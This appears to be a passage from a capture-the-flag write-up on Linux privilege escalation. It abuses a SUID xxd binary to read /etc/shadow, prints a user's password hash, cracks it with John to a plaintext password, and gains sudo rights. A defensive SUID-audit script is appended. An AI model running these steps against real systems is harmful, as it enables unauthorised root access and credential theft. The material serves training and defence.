Privilege Escalation
- We can catch the Reverse Shell Using netcat
www-data@ubuntu html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
- The /usr/bin/xxd Binary has the SUID Bit Set.
www-data@ubuntu html$ find / -type f -perm -04000 -ls 2>/dev/null
...
262073 20 -rwsr-xr-x 1 root root 18552 Mar 18 2020 /usr/bin/xxd
...
- We can use xxd to Read any File on the System
www-data@ubuntu html$ LFILE=/etc/shadow
www-data@ubuntu html$ xxd "$LFILE" | xxd -r
root:!:18507:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18506:0:99999:7:::
uuidd:*:18506:0:99999:7:::
vianka:$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0:18507:0:99999:7:::
- We can Brute-Force the HASH using John
- Password: beautiful1
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
beautiful1 (vianka)
- Switching to User: vianka with the Cracked Credentials.
www-data@ubuntu html$ su - vianka
Password:
vianka@ubuntu:~$ id
uid=1000(vianka) gid=1000(vianka) groups=1000(vianka),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
- The User: vianka can run any Command as ROOT
vianka@ubuntu:~$ sudo -l
Matching Defaults entries for vianka on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User vianka may run the following commands on ubuntu:
(ALL : ALL) ALL
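
The SUID bit on xxd is the misconfiguration that a baseline audit of SUID files would catch. As an added example (not part of the original write-up), the script below filters `find / -type f -perm -04000 -ls` output for root-owned SUID files that are outside an allowlist; `BASELINE`, the function names and every sample line except the xxd one are assumptions made for the example.

```shell
#!/bin/sh
# Added example: flag root-owned SUID files that are not in an expected baseline.
# BASELINE is a constructed, space-separated allowlist for this example; build
# the real one from a known-good install of your distribution.
BASELINE="/bin/su /bin/mount /usr/bin/passwd /usr/bin/sudo"

# Reads `find / -type f -perm -04000 -ls` output on stdin and prints the
# path of every root-owned SUID file that is missing from the baseline.
unexpected_suid() {
    awk -v baseline="$BASELINE" '
        BEGIN { n = split(baseline, b, " "); for (i = 1; i <= n; i++) ok[b[i]] = 1 }
        # find -ls columns: inode blocks mode links owner group size mon day year path
        NF >= 11 && $3 ~ /^-..[sS]/ && $5 == "root" {
            path = $11
            for (i = 12; i <= NF; i++) path = path " " $i   # keep spaces in names
            if (!(path in ok)) print path
        }'
}

# Sample input: the xxd line is from the write-up, the others are constructed.
sample_listing() {
    cat <<'EOF'
262073 20 -rwsr-xr-x 1 root root 18552 Mar 18 2020 /usr/bin/xxd
262001 56 -rwsr-xr-x 1 root root 54256 Mar 26 2019 /usr/bin/passwd
131099 40 -rwsr-xr-x 1 root root 40128 Mar 26 2019 /bin/su
262500 12 -rwxr-xr-x 1 root root 10240 Jan  1 2020 /usr/bin/notsuid
EOF
}

findings=$(sample_listing | unexpected_suid)
printf 'Unexpected SUID root files:\n%s\n' "$findings"
# Remediation for a finding that has no need to run as root:
#   chmod u-s /usr/bin/xxd
```

On a live host, pipe the real `find` output into `unexpected_suid` instead of `sample_listing`.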